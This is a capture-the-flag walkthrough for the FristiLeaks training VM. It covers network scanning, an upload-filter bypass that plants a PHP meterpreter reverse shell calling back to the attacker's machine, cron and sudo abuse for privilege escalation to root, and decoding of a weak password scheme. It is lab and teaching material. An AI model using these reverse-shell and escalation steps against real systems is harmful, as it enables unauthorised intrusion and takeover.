Description:
A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..
NOTE: to set it up, the VM's MAC address must be changed to 08:00:27:A5:A6:76. This is what the VM looks like once booted. The goal is to become root and get the flag.
Information gathering
First, find the target machine:
root@kali:~# nmap -sn 192.168.224.0/24
Starting Nmap 7.40 ( https://nmap.org )
Nmap scan report for 192.168.224.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.224.2
Host is up (0.00016s latency).
MAC Address: 00:50:56:FD:70:F2 (VMware)
Nmap scan report for 192.168.224.135
Host is up (0.00016s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.224.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:FB:7A:70 (VMware)
Nmap scan report for 192.168.224.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.71 seconds
The target host is at 192.168.224.135; scan it:
nmap -sS -sV -T4 -A -O 192.168.224.135
Starting Nmap 7.40 ( https://nmap.org )
Nmap scan report for 192.168.224.135
Host is up (0.0016s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop
What we learn: port 80 is open, running Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3), and there is a robots.txt.
Finding a way in
First, browse the website.
Check robots.txt and visit the three listed directories, but each just returns the same image.
That seems useless, but notice that all three names are drinks; together with the homepage's "keep calm and drink fristi", try /fristi.
That gives a login page! :) View the page source.
There is a comment left by eezeepz, and the image that follows is base64-encoded; further down is another commented-out block, so try base64 on it too: it decodes to an image that appears to show a password.
Logging in with eezeepz as the username succeeds.
Now files can be uploaded.
There is a simple filter that only allows png, jpg and gif, but changing the file extension bypasses it.
Exploitation
Append a .jpg suffix, upload a reverse shell, and set up a listener:
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.224.136
lhost => 192.168.224.136
msf exploit(handler) > set lport 445
lport => 445
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.224.136:445
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.224.135
[*] Meterpreter session 1 opened (192.168.224.136:445 -> 192.168.224.135:57657) at 2018-02-14 17:34:28 +0800
meterpreter > shell
Process 5305 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/var/www/html/fristi/uploads
There are quite a few files; walking up directory by directory, /var/www contains a notes.txt:
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
So look in eezeepz's home directory, which also contains a notes.txt:
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
The hint: the commands chmod, df, cat, echo, ps, grep and egrep can be used, a file named runthis has to be created in /tmp/, after which a cronresult file appears, and the commands are run with his (admin's) privileges.
To read admin's home directory, use chmod to change its permissions:
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
ls
cronresult
runthis
cat cronresult
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
Now the admin directory is accessible:
cd admin
ls
cat
chmod
cronjob.py
cryptedpass.txt
cryptpass.py
df
echo
egrep
grep
ps
whoisyourgodnow.txt
cryptedpass.txt and cryptpass.py are the interesting ones. cryptpass.py (indentation restored and comments added; the script is Python 2):
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    # step 1: base64-encode the plaintext
    base64string= base64.b64encode(str)
    # step 2: reverse the base64 text, then step 3: apply rot13 to it
    return codecs.encode(base64string[::-1], 'rot13')
# the plaintext password comes from the first command-line argument
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
whoisyourgodnow.txt:
=RFn0AKnlMHMPIzpyuTI0ITG
So the passwords are "encrypted" by first base64-encoding them, then reversing the string and applying rot13.
Decoding the two files gives:
thisisalsopw123
LetThereBeFristi!
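Reversing the scheme, as an added example that is not the VM's script: rot13 is its own inverse, so apply it again, un-reverse the string, and base64-decode. There is no key anywhere, so this is obfuscation rather than encryption, and anyone who finds cryptpass.py can recover every password stored this way. The input below is the whoisyourgodnow.txt value shown above; encode_string is a Python 3 port of the VM's function, included only for the round-trip check.

```python
import base64
import codecs


def encode_string(plain: str) -> str:
    # Python 3 port of cryptpass.py: base64, reverse, rot13 (no key involved).
    b64 = base64.b64encode(plain.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(crypted: str) -> str:
    # Undo the steps in reverse order. rot13 applied twice is the identity,
    # so one more pass restores the reversed base64 text; un-reverse, decode.
    reversed_b64 = codecs.decode(crypted, "rot13")
    return base64.b64decode(reversed_b64[::-1]).decode("utf-8")


if __name__ == "__main__":
    # value copied from whoisyourgodnow.txt on the VM
    print(decode_string("=RFn0AKnlMHMPIzpyuTI0ITG"))
```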
This is probably the password of another user, fristigod.
Switching with su - here hit a problem: "standard in must be a tty". Searching around, this can be solved by using python to spawn a pseudo-terminal: python -c 'import pty;pty.spawn("/bin/sh")'. The reason is that su (and sudo) is not a simple process: for security reasons, Linux requires the user to enter the password from a terminal device (tty) rather than from standard input (stdin). In other words, when you type the password, sudo is essentially reading the keyboard, not characters typed into bash. So, to be able to enter the password, we have to simulate a terminal device.
python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.1$ su - fristigod
su - fristigod
Password: LetThereBeFristi!
We are now in the fristigod account:
-bash-4.1$ pwd
pwd
/var/fristigod
-bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
-bash-4.1$ ls
ls
Still not root, and the directory looks empty; try ls -al:
-bash-4.1$ ls -al
ls -al
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff
-bash-4.1$ cd .secret_admin_stuff/
-bash-4.1$ ls -al
ls -al
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 ..
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
No permission for doCom, so look at the command history:
-bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
Evidently fristigod mostly used sudo, so try sudo as well:
-bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
Following the hint, try:
-bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...
-bash-4.1$
Spawn a shell:
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1# cd /root
cd /root
bash-4.1# ls
ls
fristileaks_secrets.txt
bash-4.1# cat fri
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
Got the flag. Done.
Summary: tty, pty and pts in Linux
1. tty (the general term for terminal devices): the word tty comes from Teletypes, or teletypewriters, which originally referred to teletype machines, devices that read and sent messages through a printer keyboard over a serial line. They were later replaced by keyboards and monitors, so "terminal" is the more appropriate term today. A terminal is a character device; there are many types, and tty is commonly used as shorthand for all kinds of terminal devices.
2. pty (pseudo-terminal): when we telnet to a remote host or use xterm, don't we also need a terminal to interact with? Yes, and that is the pseudo-terminal, pty (pseudo-tty).
3. pts/ptmx (used together to implement a pty): pts (pseudo-terminal slave) is how a pty is realised, working in tandem with ptmx (pseudo-terminal master).
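To make the tty requirement behind the earlier "standard in must be a tty" error concrete, and to tie it to the pts/ptmx pairing above, here is an added example (not part of the writeup) for Python 3 on Linux: isatty() on a pipe, which is what a reverse shell's stdin looks like, reports False, while the slave side of a pseudo-terminal opened through /dev/ptmx reports True and has a /dev/pts/N name; pty.spawn("/bin/sh") hands the shell such a slave as its stdin.

```python
import os
import pty


def fd_is_terminal(fd: int) -> bool:
    # The same check su and sudo rely on: isatty() asks the kernel whether
    # the descriptor is backed by a terminal (tty) device.
    return os.isatty(fd)


def pipe_stdin_is_terminal() -> bool:
    # A reverse shell's stdin is a pipe or socket, so this is False; that is
    # the situation behind the "standard in must be a tty" message.
    read_end, write_end = os.pipe()
    try:
        return fd_is_terminal(read_end)
    finally:
        os.close(read_end)
        os.close(write_end)


def pty_slave_info() -> tuple:
    # pty.openpty() opens the master via /dev/ptmx and returns the paired
    # slave; a shell given the slave as stdin/stdout (what pty.spawn does)
    # passes the isatty() check and sees a /dev/pts/N device.
    master, slave = pty.openpty()
    try:
        return fd_is_terminal(slave), os.ttyname(slave)
    finally:
        os.close(master)
        os.close(slave)


if __name__ == "__main__":
    print("pipe is a tty:", pipe_stdin_is_terminal())
    print("pty slave is a tty, device name:", pty_slave_info())
```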
References:
http://blog.sina.com.cn/s/blog_638ac15c01012e0v.html
https://g0blin.co.uk/fristileaks-1-3-vulnhub-writeup/#-cola-sisi-and-beer
The end :)